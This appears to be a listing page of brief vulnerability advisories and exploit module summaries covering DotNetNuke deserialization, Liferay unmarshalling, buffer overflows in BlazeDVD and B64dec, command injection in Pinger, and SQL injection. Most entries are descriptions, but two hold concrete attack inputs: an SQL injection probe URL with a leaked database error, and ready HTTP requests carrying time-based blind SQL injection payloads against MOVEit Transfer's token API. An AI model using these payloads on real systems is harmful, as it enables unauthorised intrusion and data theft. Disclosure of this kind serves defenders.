This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data. This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.
This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
BlazeDVD 7.0.2 is vulnerable to a buffer overflow vulnerability due to improper bounds checking of user-supplied data. An attacker can exploit this vulnerability by supplying a specially crafted .plf file, which can lead to arbitrary code execution. The vulnerability is triggered when the application attempts to open a specially crafted .plf file.
script has SQLI in books category at this dir /lms/home/book?category_name=00*SQLI Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3 SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21 Filename: models/Basic.php Line Number: 284
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 ios mobile application.
The vulnerability laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Pinger 1.0 is a simple jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down. An attacker can exploit this vulnerability by sending a malicious payload to the ping.php and socket.php parameters, which will be executed on the server.
The vulnerability laboratory core research team discovered multiple persistent cross site web vulnerabilities in the official SuperBackup v2.0.5 ios mobile application.
B64dec 1.1.2 is vulnerable to a buffer overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input to the application, which can lead to arbitrary code execution. The exploit uses a SEH overflow and an egg hunter to locate the payload in memory.
The API call for revoking logon tokens is vulnerable to a Time based blind SQL injection via the 'token' parameter. MSSQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 32 token='; WAITFOR DELAY '0:0:10'-- MySQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 21 token=' OR SLEEP(10);--
Services By CQR